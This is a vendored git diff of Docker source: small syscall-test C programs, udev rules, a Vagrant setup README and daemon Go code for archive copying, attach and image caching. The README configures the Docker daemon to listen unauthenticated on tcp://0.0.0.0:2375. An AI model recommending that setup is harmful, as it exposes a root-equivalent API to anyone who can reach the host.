%eax + incl %eax + movb $0, %bl + int $0x80 diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c new file mode 
100644 index 0000000000..33684e1c3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c @@ -0,0 +1,63 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */ + +struct clone_args { + char **argv; +}; + +// child_exec is the func that will be executed as the result of clone +static int child_exec(void *stuff) +{ + struct clone_args *args = (struct clone_args *)stuff; + if (execvp(args->argv[0], args->argv) != 0) { + fprintf(stderr, "failed to execvp argments %s\n", + strerror(errno)); + exit(-1); + } + // we should never reach here! + exit(EXIT_FAILURE); +} + +int main(int argc, char **argv) +{ + struct clone_args args; + args.argv = &argv[1]; + + int clone_flags = CLONE_NEWNS | CLONE_NEWPID | SIGCHLD; + + // allocate stack for child + char *stack; /* Start of stack buffer */ + char *child_stack; /* End of stack buffer */ + stack = + mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_STACK, -1, 0); + if (stack == MAP_FAILED) { + fprintf(stderr, "mmap failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + child_stack = stack + STACK_SIZE; /* Assume stack grows downward */ + + // the result of this call is that our child_exec will be run in another + // process returning its pid + pid_t pid = clone(child_exec, child_stack, clone_flags, &args); + if (pid < 0) { + fprintf(stderr, "clone failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + // lets wait on our child process here before we, the parent, exits + if (waitpid(pid, NULL, 0) == -1) { + fprintf(stderr, "failed to wait pid %d\n", pid); + exit(EXIT_FAILURE); + } + exit(EXIT_SUCCESS); +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/raw.c b/vendor/github.com/docker/docker/contrib/syscall-test/raw.c new file mode 100644 index 0000000000..7995a0d3a5 --- /dev/null +++ 
b/vendor/github.com/docker/docker/contrib/syscall-test/raw.c @@ -0,0 +1,14 @@ +#include +#include +#include +#include +#include + +int main() { + if (socket(PF_INET, SOCK_RAW, IPPROTO_UDP) == -1) { + perror("socket"); + return 1; + } + + return 0; +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c b/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c new file mode 100644 index 0000000000..df9680c869 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c @@ -0,0 +1,11 @@ +#include +#include +#include + +int main() { + if (setgid(1) == -1) { + perror("setgid"); + return 1; + } + return 0; +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c b/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c new file mode 100644 index 0000000000..5b939677e9 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c @@ -0,0 +1,11 @@ +#include +#include +#include + +int main() { + if (setuid(1) == -1) { + perror("setuid"); + return 1; + } + return 0; +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/socket.c b/vendor/github.com/docker/docker/contrib/syscall-test/socket.c new file mode 100644 index 0000000000..d26c82f00f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/syscall-test/socket.c @@ -0,0 +1,30 @@ +#include +#include +#include +#include +#include +#include + +int main() { + int s; + struct sockaddr_in sin; + + s = socket(AF_INET, SOCK_STREAM, 0); + if (s == -1) { + perror("socket"); + return 1; + } + + sin.sin_family = AF_INET; + sin.sin_addr.s_addr = INADDR_ANY; + sin.sin_port = htons(80); + + if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) == -1) { + perror("bind"); + return 1; + } + + close(s); + + return 0; +} diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c new file mode 100644 index 0000000000..2af36f4228 --- /dev/null +++ 
b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c @@ -0,0 +1,63 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */ + +struct clone_args { + char **argv; +}; + +// child_exec is the func that will be executed as the result of clone +static int child_exec(void *stuff) +{ + struct clone_args *args = (struct clone_args *)stuff; + if (execvp(args->argv[0], args->argv) != 0) { + fprintf(stderr, "failed to execvp argments %s\n", + strerror(errno)); + exit(-1); + } + // we should never reach here! + exit(EXIT_FAILURE); +} + +int main(int argc, char **argv) +{ + struct clone_args args; + args.argv = &argv[1]; + + int clone_flags = CLONE_NEWUSER | SIGCHLD; + + // allocate stack for child + char *stack; /* Start of stack buffer */ + char *child_stack; /* End of stack buffer */ + stack = + mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_STACK, -1, 0); + if (stack == MAP_FAILED) { + fprintf(stderr, "mmap failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + child_stack = stack + STACK_SIZE; /* Assume stack grows downward */ + + // the result of this call is that our child_exec will be run in another + // process returning its pid + pid_t pid = clone(child_exec, child_stack, clone_flags, &args); + if (pid < 0) { + fprintf(stderr, "clone failed: %s\n", strerror(errno)); + exit(EXIT_FAILURE); + } + // lets wait on our child process here before we, the parent, exits + if (waitpid(pid, NULL, 0) == -1) { + fprintf(stderr, "failed to wait pid %d\n", pid); + exit(EXIT_FAILURE); + } + exit(EXIT_SUCCESS); +} diff --git a/vendor/github.com/docker/docker/contrib/udev/80-docker.rules b/vendor/github.com/docker/docker/contrib/udev/80-docker.rules new file mode 100644 index 0000000000..f934c01757 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/udev/80-docker.rules @@ -0,0 +1,3 @@ +# hide docker's 
loopback devices from udisks, and thus from user desktops +SUBSYSTEM=="block", ENV{DM_NAME}=="docker-*", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_IGNORE}="1" +SUBSYSTEM=="block", DEVPATH=="/devices/virtual/block/loop*", ATTR{loop/backing_file}=="/var/lib/docker/*", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_IGNORE}="1" diff --git a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md new file mode 100644 index 0000000000..286a98504a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md @@ -0,0 +1,50 @@ +# Vagrant integration + +Currently there are at least 4 different projects that we are aware of that deals +with integration with [Vagrant](http://vagrantup.com/) at different levels. One +approach is to use Docker as a [provisioner](http://docs.vagrantup.com/v2/provisioning/index.html) +which means you can create containers and pull base images on VMs using Docker's +CLI and the other is to use Docker as a [provider](http://docs.vagrantup.com/v2/providers/index.html), +meaning you can use Vagrant to control Docker containers. + + +### Provisioners + +* [Vocker](https://github.com/fgrehm/vocker) +* [Ventriloquist](https://github.com/fgrehm/ventriloquist) + +### Providers + +* [docker-provider](https://github.com/fgrehm/docker-provider) +* [vagrant-shell](https://github.com/destructuring/vagrant-shell) + +## Setting up Vagrant-docker with the Engine API + +The initial Docker upstart script will not work because it runs on `127.0.0.1`, which is not accessible to the host machine. Instead, we need to change the script to connect to `0.0.0.0`. 
To do this, modify `/etc/init/docker.conf` to look like this: + +``` +description "Docker daemon" + +start on filesystem +stop on runlevel [!2345] + +respawn + +script + /usr/bin/docker daemon -H=tcp://0.0.0.0:2375 +end script +``` + +Once that's done, you need to set up a SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal: + +``` +ssh -L 2375:localhost:2375 -p 2222 vagrant@localhost +``` + +(The first 2375 is what your host can connect to, the second 2375 is what port Docker is running on in the vagrant machine, and the 2222 is the port Vagrant is providing for SSH. If VirtualBox is the VM you're using, you can see what value "2222" should be by going to: Network > Adapter 1 > Advanced > Port Forwarding in the VirtualBox GUI.) + +Note that because the port has been changed, to run docker commands from within the command line you must run them like this: + +``` +sudo docker -H 0.0.0.0:2375 < commands for docker > +``` diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default.go b/vendor/github.com/docker/docker/daemon/apparmor_default.go new file mode 100644 index 0000000000..09dd0541b8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/apparmor_default.go @@ -0,0 +1,36 @@ +// +build linux + +package daemon + +import ( + "fmt" + + aaprofile "github.com/docker/docker/profiles/apparmor" + "github.com/opencontainers/runc/libcontainer/apparmor" +) + +// Define constants for native driver +const ( + defaultApparmorProfile = "docker-default" +) + +func ensureDefaultAppArmorProfile() error { + if apparmor.IsEnabled() { + loaded, err := aaprofile.IsLoaded(defaultApparmorProfile) + if err != nil { + return fmt.Errorf("Could not check if %s AppArmor profile was loaded: %s", defaultApparmorProfile, err) + } + + // Nothing to do. + if loaded { + return nil + } + + // Load the profile. 
+ if err := aaprofile.InstallDefault(defaultApparmorProfile); err != nil { + return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded.", defaultApparmorProfile) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go new file mode 100644 index 0000000000..cd2dd9702e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux + +package daemon + +func ensureDefaultAppArmorProfile() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/archive.go b/vendor/github.com/docker/docker/daemon/archive.go new file mode 100644 index 0000000000..1999f1243b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive.go @@ -0,0 +1,436 @@ +package daemon + +import ( + "errors" + "io" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/builder" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" +) + +// ErrExtractPointNotDirectory is used to convey that the operation to extract +// a tar archive to a directory in a container has failed because the specified +// path does not refer to a directory. +var ErrExtractPointNotDirectory = errors.New("extraction point is not a directory") + +// ContainerCopy performs a deprecated operation of archiving the resource at +// the specified path in the container identified by the given name. 
+func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + if res[0] == '/' || res[0] == '\\' { + res = res[1:] + } + + return daemon.containerCopy(container, res) +} + +// ContainerStatPath stats the filesystem resource at the specified path in the +// container identified by the given name. +func (daemon *Daemon) ContainerStatPath(name string, path string) (stat *types.ContainerPathStat, err error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + return daemon.containerStatPath(container, path) +} + +// ContainerArchivePath creates an archive of the filesystem resource at the +// specified path in the container identified by the given name. Returns a +// tar archive of the resource and whether it was a directory or a single file. +func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, nil, err + } + + return daemon.containerArchivePath(container, path) +} + +// ContainerExtractToDir extracts the given archive to the specified location +// in the filesystem of the container identified by the given name. The given +// path must be of a directory in the container. If it is not, the error will +// be ErrExtractPointNotDirectory. If noOverwriteDirNonDir is true then it will +// be an error if unpacking the given content would cause an existing directory +// to be replaced with a non-directory and vice versa. 
+func (daemon *Daemon) ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + return daemon.containerExtractToDir(container, path, noOverwriteDirNonDir, content) +} + +// containerStatPath stats the filesystem resource at the specified path in this +// container. Returns stat info about the resource. +func (daemon *Daemon) containerStatPath(container *container.Container, path string) (stat *types.ContainerPathStat, err error) { + container.Lock() + defer container.Unlock() + + if err = daemon.Mount(container); err != nil { + return nil, err + } + defer daemon.Unmount(container) + + err = daemon.mountVolumes(container) + defer container.DetachAndUnmount(daemon.LogVolumeEvent) + if err != nil { + return nil, err + } + + resolvedPath, absPath, err := container.ResolvePath(path) + if err != nil { + return nil, err + } + + return container.StatPath(resolvedPath, absPath) +} + +// containerArchivePath creates an archive of the filesystem resource at the specified +// path in this container. Returns a tar archive of the resource and stat info +// about the resource. +func (daemon *Daemon) containerArchivePath(container *container.Container, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error) { + container.Lock() + + defer func() { + if err != nil { + // Wait to unlock the container until the archive is fully read + // (see the ReadCloseWrapper func below) or if there is an error + // before that occurs. 
+ container.Unlock() + } + }() + + if err = daemon.Mount(container); err != nil { + return nil, nil, err + } + + defer func() { + if err != nil { + // unmount any volumes + container.DetachAndUnmount(daemon.LogVolumeEvent) + // unmount the container's rootfs + daemon.Unmount(container) + } + }() + + if err = daemon.mountVolumes(container); err != nil { + return nil, nil, err + } + + resolvedPath, absPath, err := container.ResolvePath(path) + if err != nil { + return nil, nil, err + } + + stat, err = container.StatPath(resolvedPath, absPath) + if err != nil { + return nil, nil, err + } + + // We need to rebase the archive entries if the last element of the + // resolved path was a symlink that was evaluated and is now different + // than the requested path. For example, if the given path was "/foo/bar/", + // but it resolved to "/var/lib/docker/containers/{id}/foo/baz/", we want + // to ensure that the archive entries start with "bar" and not "baz". This + // also catches the case when the root directory of the container is + // requested: we want the archive entries to start with "/" and not the + // container ID. + data, err := archive.TarResourceRebase(resolvedPath, filepath.Base(absPath)) + if err != nil { + return nil, nil, err + } + + content = ioutils.NewReadCloserWrapper(data, func() error { + err := data.Close() + container.DetachAndUnmount(daemon.LogVolumeEvent) + daemon.Unmount(container) + container.Unlock() + return err + }) + + daemon.LogContainerEvent(container, "archive-path") + + return content, stat, nil +} + +// containerExtractToDir extracts the given tar archive to the specified location in the +// filesystem of this container. The given path must be of a directory in the +// container. If it is not, the error will be ErrExtractPointNotDirectory. If +// noOverwriteDirNonDir is true then it will be an error if unpacking the +// given content would cause an existing directory to be replaced with a non- +// directory and vice versa. 
+func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, noOverwriteDirNonDir bool, content io.Reader) (err error) { + container.Lock() + defer container.Unlock() + + if err = daemon.Mount(container); err != nil { + return err + } + defer daemon.Unmount(container) + + err = daemon.mountVolumes(container) + defer container.DetachAndUnmount(daemon.LogVolumeEvent) + if err != nil { + return err + } + + // Check if a drive letter supplied, it must be the system drive. No-op except on Windows + path, err = system.CheckSystemDriveAndRemoveDriveLetter(path) + if err != nil { + return err + } + + // The destination path needs to be resolved to a host path, with all + // symbolic links followed in the scope of the container's rootfs. Note + // that we do not use `container.ResolvePath(path)` here because we need + // to also evaluate the last path element if it is a symlink. This is so + // that you can extract an archive to a symlink that points to a directory. + + // Consider the given path as an absolute path in the container. + absPath := archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path) + + // This will evaluate the last path element if it is a symlink. + resolvedPath, err := container.GetResourcePath(absPath) + if err != nil { + return err + } + + stat, err := os.Lstat(resolvedPath) + if err != nil { + return err + } + + if !stat.IsDir() { + return ErrExtractPointNotDirectory + } + + // Need to check if the path is in a volume. If it is, it cannot be in a + // read-only volume. If it is not in a volume, the container cannot be + // configured with a read-only rootfs. + + // Use the resolved path relative to the container rootfs as the new + // absPath. This way we fully follow any symlinks in a volume that may + // lead back outside the volume. + // + // The Windows implementation of filepath.Rel in golang 1.4 does not + // support volume style file path semantics. 
On Windows when using the + // filter driver, we are guaranteed that the path will always be + // a volume file path. + var baseRel string + if strings.HasPrefix(resolvedPath, `\\?\Volume{`) { + if strings.HasPrefix(resolvedPath, container.BaseFS) { + baseRel = resolvedPath[len(container.BaseFS):] + if baseRel[:1] == `\` { + baseRel = baseRel[1:] + } + } + } else { + baseRel, err = filepath.Rel(container.BaseFS, resolvedPath) + } + if err != nil { + return err + } + // Make it an absolute path. + absPath = filepath.Join(string(filepath.Separator), baseRel) + + toVolume, err := checkIfPathIsInAVolume(container, absPath) + if err != nil { + return err + } + + if !toVolume && container.HostConfig.ReadonlyRootfs { + return ErrRootFSReadOnly + } + + uid, gid := daemon.GetRemappedUIDGID() + options := &archive.TarOptions{ + NoOverwriteDirNonDir: noOverwriteDirNonDir, + ChownOpts: &archive.TarChownOptions{ + UID: uid, GID: gid, // TODO: should all ownership be set to root (either real or remapped)? + }, + } + if err := chrootarchive.Untar(content, resolvedPath, options); err != nil { + return err + } + + daemon.LogContainerEvent(container, "extract-to-dir") + + return nil +} + +func (daemon *Daemon) containerCopy(container *container.Container, resource string) (rc io.ReadCloser, err error) { + container.Lock() + + defer func() { + if err != nil { + // Wait to unlock the container until the archive is fully read + // (see the ReadCloseWrapper func below) or if there is an error + // before that occurs. 
+ container.Unlock() + } + }() + + if err := daemon.Mount(container); err != nil { + return nil, err + } + + defer func() { + if err != nil { + // unmount any volumes + container.DetachAndUnmount(daemon.LogVolumeEvent) + // unmount the container's rootfs + daemon.Unmount(container) + } + }() + + if err := daemon.mountVolumes(container); err != nil { + return nil, err + } + + basePath, err := container.GetResourcePath(resource) + if err != nil { + return nil, err + } + stat, err := os.Stat(basePath) + if err != nil { + return nil, err + } + var filter []string + if !stat.IsDir() { + d, f := filepath.Split(basePath) + basePath = d + filter = []string{f} + } else { + filter = []string{filepath.Base(basePath)} + basePath = filepath.Dir(basePath) + } + archive, err := archive.TarWithOptions(basePath, &archive.TarOptions{ + Compression: archive.Uncompressed, + IncludeFiles: filter, + }) + if err != nil { + return nil, err + } + + reader := ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + container.DetachAndUnmount(daemon.LogVolumeEvent) + daemon.Unmount(container) + container.Unlock() + return err + }) + daemon.LogContainerEvent(container, "copy") + return reader, nil +} + +// CopyOnBuild copies/extracts a source FileInfo to a destination path inside a container +// specified by a container object. +// TODO: make sure callers don't unnecessarily convert destPath with filepath.FromSlash (Copy does it already). +// CopyOnBuild should take in abstract paths (with slashes) and the implementation should convert it to OS-specific paths. 
+func (daemon *Daemon) CopyOnBuild(cID string, destPath string, src builder.FileInfo, decompress bool) error { + srcPath := src.Path() + destExists := true + destDir := false + rootUID, rootGID := daemon.GetRemappedUIDGID() + + // Work in daemon-local OS specific file paths + destPath = filepath.FromSlash(destPath) + + c, err := daemon.GetContainer(cID) + if err != nil { + return err + } + err = daemon.Mount(c) + if err != nil { + return err + } + defer daemon.Unmount(c) + + dest, err := c.GetResourcePath(destPath) + if err != nil { + return err + } + + // Preserve the trailing slash + // TODO: why are we appending another path separator if there was already one? + if strings.HasSuffix(destPath, string(os.PathSeparator)) || destPath == "." { + destDir = true + dest += string(os.PathSeparator) + } + + destPath = dest + + destStat, err := os.Stat(destPath) + if err != nil { + if !os.IsNotExist(err) { + //logrus.Errorf("Error performing os.Stat on %s. %s", destPath, err) + return err + } + destExists = false + } + + uidMaps, gidMaps := daemon.GetUIDGIDMaps() + archiver := &archive.Archiver{ + Untar: chrootarchive.Untar, + UIDMaps: uidMaps, + GIDMaps: gidMaps, + } + + if src.IsDir() { + // copy as directory + if err := archiver.CopyWithTar(srcPath, destPath); err != nil { + return err + } + return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists) + } + if decompress && archive.IsArchivePath(srcPath) { + // Only try to untar if it is a file and that we've been told to decompress (when ADD-ing a remote file) + + // First try to unpack the source as an archive + // to support the untar feature we need to clean up the path a little bit + // because tar is very forgiving. 
First we need to strip off the archive's + // filename from the path but this is only added if it does not end in slash + tarDest := destPath + if strings.HasSuffix(tarDest, string(os.PathSeparator)) { + tarDest = filepath.Dir(destPath) + } + + // try to successfully untar the orig + err := archiver.UntarPath(srcPath, tarDest) + /* + if err != nil { + logrus.Errorf("Couldn't untar to %s: %v", tarDest, err) + } + */ + return err + } + + // only needed for fixPermissions, but might as well put it before CopyFileWithTar + if destDir || (destExists && destStat.IsDir()) { + destPath = filepath.Join(destPath, src.Name()) + } + + if err := idtools.MkdirAllNewAs(filepath.Dir(destPath), 0755, rootUID, rootGID); err != nil { + return err + } + if err := archiver.CopyFileWithTar(srcPath, destPath); err != nil { + return err + } + + return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists) +} diff --git a/vendor/github.com/docker/docker/daemon/archive_unix.go b/vendor/github.com/docker/docker/daemon/archive_unix.go new file mode 100644 index 0000000000..47666fe5e8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_unix.go @@ -0,0 +1,58 @@ +// +build !windows + +package daemon + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/container" +) + +// checkIfPathIsInAVolume checks if the path is in a volume. If it is, it +// cannot be in a read-only volume. If it is not in a volume, the container +// cannot be configured with a read-only rootfs. 
+func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) { + var toVolume bool + for _, mnt := range container.MountPoints { + if toVolume = mnt.HasResource(absPath); toVolume { + if mnt.RW { + break + } + return false, ErrVolumeReadonly + } + } + return toVolume, nil +} + +func fixPermissions(source, destination string, uid, gid int, destExisted bool) error { + // If the destination didn't already exist, or the destination isn't a + // directory, then we should Lchown the destination. Otherwise, we shouldn't + // Lchown the destination. + destStat, err := os.Stat(destination) + if err != nil { + // This should *never* be reached, because the destination must've already + // been created while untar-ing the context. + return err + } + doChownDestination := !destExisted || !destStat.IsDir() + + // We Walk on the source rather than on the destination because we don't + // want to change permissions on things we haven't created or modified. + return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error { + // Do not alter the walk root iff. it existed before, as it doesn't fall under + // the domain of "things we should chown". + if !doChownDestination && (source == fullpath) { + return nil + } + + // Path is prefixed by source: substitute with destination instead. + cleaned, err := filepath.Rel(source, fullpath) + if err != nil { + return err + } + + fullpath = filepath.Join(destination, cleaned) + return os.Lchown(fullpath, uid, gid) + }) +} diff --git a/vendor/github.com/docker/docker/daemon/archive_windows.go b/vendor/github.com/docker/docker/daemon/archive_windows.go new file mode 100644 index 0000000000..b3a1045341 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_windows.go @@ -0,0 +1,18 @@ +package daemon + +import "github.com/docker/docker/container" + +// checkIfPathIsInAVolume checks if the path is in a volume. If it is, it +// cannot be in a read-only volume. 
If it is not in a volume, the container +// cannot be configured with a read-only rootfs. +// +// This is a no-op on Windows which does not support read-only volumes, or +// extracting to a mount point inside a volume. TODO Windows: FIXME Post-TP5 +func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) { + return false, nil +} + +func fixPermissions(source, destination string, uid, gid int, destExisted bool) error { + // chown is not supported on Windows + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/attach.go b/vendor/github.com/docker/docker/daemon/attach.go new file mode 100644 index 0000000000..917237dd89 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/attach.go @@ -0,0 +1,147 @@ +package daemon + +import ( + "fmt" + "io" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/pkg/stdcopy" + "github.com/docker/docker/pkg/term" +) + +// ContainerAttach attaches to logs according to the config passed in. See ContainerAttachConfig. +func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerAttachConfig) error { + keys := []byte{} + var err error + if c.DetachKeys != "" { + keys, err = term.ToBytes(c.DetachKeys) + if err != nil { + return fmt.Errorf("Invalid escape keys (%s) provided", c.DetachKeys) + } + } + + container, err := daemon.GetContainer(prefixOrName) + if err != nil { + return err + } + if container.IsPaused() { + err := fmt.Errorf("Container %s is paused. 
Unpause the container before attach", prefixOrName) + return errors.NewRequestConflictError(err) + } + + inStream, outStream, errStream, err := c.GetStreams() + if err != nil { + return err + } + defer inStream.Close() + + if !container.Config.Tty && c.MuxStreams { + errStream = stdcopy.NewStdWriter(errStream, stdcopy.Stderr) + outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) + } + + var stdin io.ReadCloser + var stdout, stderr io.Writer + + if c.UseStdin { + stdin = inStream + } + if c.UseStdout { + stdout = outStream + } + if c.UseStderr { + stderr = errStream + } + + if err := daemon.containerAttach(container, stdin, stdout, stderr, c.Logs, c.Stream, keys); err != nil { + fmt.Fprintf(outStream, "Error attaching: %s\n", err) + } + return nil +} + +// ContainerAttachRaw attaches the provided streams to the container's stdio +func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error { + container, err := daemon.GetContainer(prefixOrName) + if err != nil { + return err + } + return daemon.containerAttach(container, stdin, stdout, stderr, false, stream, nil) +} + +func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadCloser, stdout, stderr io.Writer, logs, stream bool, keys []byte) error { + if logs { + logDriver, err := daemon.getLogger(c) + if err != nil { + return err + } + cLog, ok := logDriver.(logger.LogReader) + if !ok { + return logger.ErrReadLogsNotSupported + } + logs := cLog.ReadLogs(logger.ReadConfig{Tail: -1}) + + LogLoop: + for { + select { + case msg, ok := <-logs.Msg: + if !ok { + break LogLoop + } + if msg.Source == "stdout" && stdout != nil { + stdout.Write(msg.Line) + } + if msg.Source == "stderr" && stderr != nil { + stderr.Write(msg.Line) + } + case err := <-logs.Err: + logrus.Errorf("Error streaming logs: %v", err) + break LogLoop + } + } + } + + daemon.LogContainerEvent(c, "attach") + + //stream + if stream { + var stdinPipe io.ReadCloser + if 
stdin != nil { + r, w := io.Pipe() + go func() { + defer w.Close() + defer logrus.Debug("Closing buffered stdin pipe") + io.Copy(w, stdin) + }() + stdinPipe = r + } + + waitChan := make(chan struct{}) + if c.Config.StdinOnce && !c.Config.Tty { + go func() { + c.WaitStop(-1 * time.Second) + close(waitChan) + }() + } + + err := <-c.Attach(stdinPipe, stdout, stderr, keys) + if err != nil { + if _, ok := err.(container.DetachError); ok { + daemon.LogContainerEvent(c, "detach") + } else { + logrus.Errorf("attach failed with error: %v", err) + } + } + + // If we are in stdinonce mode, wait for the process to end + // otherwise, simply return + if c.Config.StdinOnce && !c.Config.Tty { + <-waitChan + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/auth.go b/vendor/github.com/docker/docker/daemon/auth.go new file mode 100644 index 0000000000..f5f4d7bf24 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/auth.go @@ -0,0 +1,13 @@ +package daemon + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" +) + +// AuthenticateToRegistry checks the validity of credentials in authConfig +func (daemon *Daemon) AuthenticateToRegistry(ctx context.Context, authConfig *types.AuthConfig) (string, string, error) { + return daemon.RegistryService.Auth(ctx, authConfig, dockerversion.DockerUserAgent(ctx)) +} diff --git a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go new file mode 100644 index 0000000000..87bf3ef72e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go @@ -0,0 +1,5 @@ +// +build solaris + +package daemon + +const bindMountType = "lofs" diff --git a/vendor/github.com/docker/docker/daemon/bindmount_unix.go b/vendor/github.com/docker/docker/daemon/bindmount_unix.go new file mode 100644 index 0000000000..3966babb41 --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/bindmount_unix.go @@ -0,0 +1,5 @@ +// +build linux freebsd + +package daemon + +const bindMountType = "bind" diff --git a/vendor/github.com/docker/docker/daemon/cache.go b/vendor/github.com/docker/docker/daemon/cache.go new file mode 100644 index 0000000000..a2c2c137f5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cache.go @@ -0,0 +1,254 @@ +package daemon + +import ( + "encoding/json" + "fmt" + "reflect" + "strings" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/runconfig" + "github.com/pkg/errors" +) + +// getLocalCachedImage returns the most recent created image that is a child +// of the image with imgID, that had the same config when it was +// created. nil is returned if a child cannot be found. An error is +// returned if the parent image cannot be found. +func (daemon *Daemon) getLocalCachedImage(imgID image.ID, config *containertypes.Config) (*image.Image, error) { + // Loop on the children of the given image and check the config + getMatch := func(siblings []image.ID) (*image.Image, error) { + var match *image.Image + for _, id := range siblings { + img, err := daemon.imageStore.Get(id) + if err != nil { + return nil, fmt.Errorf("unable to find image %q", id) + } + + if runconfig.Compare(&img.ContainerConfig, config) { + // check for the most up to date match + if match == nil || match.Created.Before(img.Created) { + match = img + } + } + } + return match, nil + } + + // In this case, this is `FROM scratch`, which isn't an actual image. 
+ if imgID == "" { + images := daemon.imageStore.Map() + var siblings []image.ID + for id, img := range images { + if img.Parent == imgID { + siblings = append(siblings, id) + } + } + return getMatch(siblings) + } + + // find match from child images + siblings := daemon.imageStore.Children(imgID) + return getMatch(siblings) +} + +// MakeImageCache creates a stateful image cache. +func (daemon *Daemon) MakeImageCache(sourceRefs []string) builder.ImageCache { + if len(sourceRefs) == 0 { + return &localImageCache{daemon} + } + + cache := &imageCache{daemon: daemon, localImageCache: &localImageCache{daemon}} + + for _, ref := range sourceRefs { + img, err := daemon.GetImage(ref) + if err != nil { + logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err) + continue + } + cache.sources = append(cache.sources, img) + } + + return cache +} + +// localImageCache is cache based on parent chain. +type localImageCache struct { + daemon *Daemon +} + +func (lic *localImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) { + return getImageIDAndError(lic.daemon.getLocalCachedImage(image.ID(imgID), config)) +} + +// imageCache is cache based on history objects. Requires initial set of images. 
